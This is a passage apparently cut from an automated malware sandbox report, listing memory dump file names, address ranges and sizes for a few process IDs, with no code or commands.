                            • memory/4696-247-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-246-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-245-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-181-0x0000000000000000-mapping.dmp
                            • memory/4696-235-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-236-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-237-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-238-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-239-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-240-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-244-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-243-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4848-154-0x0000000000000000-mapping.dmp
                            • memory/4936-162-0x0000000000400000-0x000000000042F000-memory.dmp
                              Filesize

                              188KB

                            • memory/4936-167-0x0000000073A10000-0x0000000073FC1000-memory.dmp
                              Filesize

                              5.7MB

                            • memory/4936-163-0x0000000073A10000-0x0000000073FC1000-memory.dmp
                              Filesize

                              5.7MB

                            • memory/4936-158-0x0000000000000000-mapping.dmp
                            • memory/4936-159-0x0000000000400000-0x000000000042F000-memory.dmp
                              Filesize

                              188KB